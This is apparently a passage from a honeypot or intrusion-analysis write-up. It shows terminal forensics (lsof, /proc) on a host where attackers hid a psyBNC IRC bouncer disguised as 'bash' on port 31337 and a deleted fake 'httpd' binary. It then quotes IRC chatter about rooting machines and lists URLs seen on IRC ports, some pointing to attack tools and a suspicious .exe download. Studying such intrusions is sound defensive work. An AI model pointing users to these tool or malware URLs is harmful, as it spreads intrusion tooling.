(deleted) httpd 6599 guest 10u IPv4 3276160 TCP pc18:acmsoda->pc19.supernet.logicomp-data.1stclass.ro:sbl (CLOSE_WAIT) httpd 6599 guest 11u sock 0,5 3279588 can't identify protocol httpd 6599 guest 12u IPv4 3279548 UDP pc18:de-cache-query->[delete]1:domain pc18:/tmp/ > lsof -p 14522 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME 
bash    14522 guest  cwd    DIR     8,1    4096 1409630 /home/guest/ /psybnc
bash 14522 guest rtd DIR 8,1 4096 2 / bash 14522 guest txt REG 8,1 210248 1417464 /home/guest/ /psybnc/bash bash 14522 guest mem REG 8,1 21788 426022 /lib/libnss_dns-2.5.so bash 14522 guest mem REG 8,1 46680 426024 /lib/libnss_files-2.5.so bash 14522 guest mem REG 8,1 76400 426061 /lib/libresolv-2.5.so bash 14522 guest mem REG 8,1 125736 425986 /lib/ld-2.5.so bash 14522 guest mem REG 8,1 1589908 426002 /lib/libc-2.5.so bash 14522 guest mem REG 8,1 208352 426025 /lib/libm-2.5.so bash 14522 guest 0u CHR 136,2 4 /dev/pts/2 (deleted) bash 14522 guest 1u CHR 136,2 4 /dev/pts/2 (deleted) bash 14522 guest 2u CHR 136,2 4 /dev/pts/2 (deleted) bash 14522 guest 3u IPv4 3281690 TCP *:31337 (LISTEN) bash 14522 guest 4w REG 8,1 574 1417469 /home/guest/ /psybnc/log/psybnc.log bash 14522 guest 5w REG 8,1 6 1417470 /home/guest/ /psybnc/psybnc.pid bash 14522 guest 7w REG 8,1 0 1417472 /home/guest/ /psybnc/log/USER1.TRL bash 14522 guest 8u IPv4 3281720 TCP pc18:video-activmail->Tampa.FL.US.Undernet.org:ircd (ESTABLISHED) pc18:/tmp/ > cd /home/quest /home/quest: No such file or directory. pc18:/tmp/ > cd /home/guest /" "/ pc18:/home/guest/ > ls ./ ../ psybnc/ PsyLinux.tgz pc18:/home/guest/ > cd psybnc/ pc18:/home/guest/ /psybnc> ls -tlr total 420 -rwxr-xr-x 1 guest guest 369 Aug 9 2000 psybncchk* -rwxr-xr-x 1 guest guest 17982 Mar 26 2001 COPYING* -rwxr-xr-x 1 guest guest 15738 Jul 15 2001 SCRIPTING* -rwxr-xr-x 1 guest guest 3901 Jan 12 2002 targets.mak* -rwxr-xr-x 1 guest guest 929 May 7 2002 config.h* -rwxr-xr-x 1 guest guest 3560 Jul 25 2003 FAQ* -rwxr-xr-x 1 guest guest 35624 Jul 26 2003 README* -rwxr-xr-x 1 guest guest 2137 Sep 26 2003 Makefile* -rwxr-xr-x 1 guest guest 1618 Sep 26 2003 TODO* -rwxr-xr-x 1 guest guest 34872 Jun 25 2004 CHANGES* -rwxr-xr-x 1 guest guest 947 Jan 6 2006 salt.h* -rwxr-xr-x 1 guest guest 8090 Jan 6 2006 makesalt* -rwxr-xr-x 1 guest guest 731 Jan 6 2006 makefile.out* -rwxr-xr-x 1 guest guest 210248 Jan 6 2006 bash* drwxr-xr-x 2 guest guest 4096 Jul 16 2007 src/ drwxr-xr-x 3 guest guest 4096 Jul 16 2007 scripts/ drwxr-xr-x 3 guest guest 4096 Jul 16 2007 menuconf/ drwxr-xr-x 2 guest guest 4096 Jul 16 2007 lang/ drwxr-xr-x 2 guest guest 12288 Jul 16 2007 help/ drwxr-xr-x 2 guest guest 4096 Jul 16 2007 tools/ drwxr-xr-x 3 guest guest 4096 Apr 16 04:43 ../ -rw------- 1 guest guest 6 Apr 16 04:44 psybnc.pid drwxr-xr-x 2 guest guest 4096 Apr 16 04:44 log/ drwxr-xr-x 2 guest guest 4096 Apr 16 04:45 motd/ -rw------- 1 guest guest 1040 Apr 16 04:51 psybnc.conf.old -rw------- 1 guest guest 1040 Apr 16 04:58 psybnc.conf drwxr-xr-x 10 guest guest 4096 Apr 16 04:58 ./ pc18:/home/guest/ /psybnc> cd /proc/6599 pc18:/proc/6599> ls -l total 0 dr-xr-xr-x 5 guest guest 0 Apr 16 00:06 ./ dr-xr-xr-x 92 root root 0 Mar 1 17:40 ../ dr-xr-xr-x 2 guest guest 0 Apr 16 09:02 attr/ -r-------- 1 guest guest 0 Apr 16 09:02 auxv -r--r--r-- 1 guest guest 0 Apr 16 06:30 cmdline -r--r--r-- 1 guest guest 0 Apr 16 09:02 cpuset lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 cwd -> /tmp/ /redone (deleted) -r-------- 1 guest guest 0 Apr 16 09:02 environ lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 exe -> /tmp/ /redone/httpd (deleted) dr-x------ 2 guest guest 0 Apr 16 08:58 fd/ -rw-r--r-- 1 guest guest 0 Apr 16 09:02 loginuid -r--r--r-- 1 guest guest 0 Apr 16 08:58 maps -rw------- 1 guest guest 0 Apr 16 09:02 mem -r--r--r-- 1 guest guest 0 Apr 16 09:02 mounts -r-------- 1 guest guest 0 Apr 16 09:02 mountstats -rw-r--r-- 1 guest guest 0 Apr 16 09:02 oom_adj -r--r--r-- 1 guest guest 0 Apr 16 09:02 oom_score lrwxrwxrwx 1 guest guest 0 Apr 16 08:58 root -> // -r--r--r-- 1 guest guest 0 Apr 16 09:02 schedstat -r-------- 1 guest guest 0 Apr 16 09:02 smaps -r--r--r-- 1 guest guest 0 Apr 16 08:58 stat -r--r--r-- 1 guest guest 0 Apr 16 09:02 statm -r--r--r-- 1 guest guest 0 Apr 16 06:30 status dr-xr-xr-x 3 guest guest 0 Apr 16 09:02 task/ -r--r--r-- 1 guest guest 0 Apr 16 09:02 wchan 
pc18:/proc/6599> cat exe  > /tmp/httpd
pc18:/proc/6599> ls -l /tmp/httpd -rw-r--r-- 1 root root 202544 Apr 16 09:02 /tmp/httpd pc18:/proc/6599> rm /tmp/httpd rm: remove regular file `/tmp/httpd'? yes pc18:/proc/6599> exit exit

IRC traffic sample

International: user that is the root .. is anyone on the local .. International: if you give me someone to root flood :)).. _keech: sheep may be in luck and catch at least one root: D. Baned #: 22 I did not just root Scanning with php .. # N.A.S.A: you have a root with php? .. International: root that had 180 days up `and nobody entered him :)).. oz: I had a root .. oz: director at the bank Top 5 URIs that have appeared in the IRC data On port 31337 155 http://radiokyky.ghcomm.net:8080/listen.pls 10 http://eliteradio.info:8181/listen.pls 8 http://cservice.undernet.org/live/view_app.php?id=1238682998-9084&back=checkapp 8 http://bsh.ro 6 http://staudeasuprata.hi5.com On port 6667 471 http://radiokyky.ghcomm.net:8080/listen.pls 73 http://bsh.ro 32 http://www.eastside.ro 26 http://asculta.radioliberty.ro:1989/listen.pls 22 http://cservice.undernet.org/live/view_app.php?id=1238751547-147470&ba On port 6669 2 http://phlo0.ucoz.de/psydarwin.tgz 2 http://alexandrucordea.ws 1 http://www.youtube.com/watch?v=wxuwycmsrto&nr=1 1 http://www.youtube.com/watch?v=mghqs3wk27w 1 http://www.youtube.com/watch?v=_5pysbiaxvs&nr=1 On port 6969 26 http://cservice.undernet.org/live/view_app.php?id=1239110902-9084&back=checkapp 7 http://www.mirc.com/get.html 4 http://79.113.108.242:8000 3 http://ftp.reflectionspress.com/postcard/postcard.exe 2 http://sportpedia.mysport.ro/images/2/21/prepelita_andrei.jpg